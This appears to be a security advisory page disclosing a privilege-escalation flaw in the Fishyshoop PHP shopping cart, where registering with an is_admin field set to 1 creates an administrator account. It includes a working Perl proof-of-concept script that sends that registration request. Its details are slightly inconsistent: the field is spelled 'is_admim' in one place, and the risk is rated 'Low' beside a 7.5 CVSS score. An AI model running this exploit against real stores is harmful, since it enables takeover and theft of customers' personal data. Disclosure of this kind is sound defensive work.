Fishyshoop Security Vulnerability

2006.12.29
Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Synopsis ======== The Fishyshoop shopping cart software contains a vulnerability which allows arbitrary users to create accounts with administrator privileges Background ========== Fishyshoop is a suite of PHP scripts allowing anybody to create an attractive online store. Affected Versions ================= Verified on 0.930 beta. Previous versions may also be affected. Impact ====== The user gains administrator privileges in the software, meaning they are free to alter many aspects of the store, as well as committing theft of personal information belonging to other users of the store. Description =========== pages/register/register.php takes every POST variable and inserts the value into a new record under a field with the same name. If a new registration is made with the variable is_admim set to 1, the account will have administrator privileges on the site. Proof of Concept ================ #!/usr/bin/perl use WWW::Curl::Easy; sub usage() { print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>n"; exit(); } $FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage(); my $fishyshoop = new WWW::Curl::Easy; $fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register"); $fishyshoop->setopt(CURLOPT_POST, 1); $fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1"); $fishyshoop->perform;


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top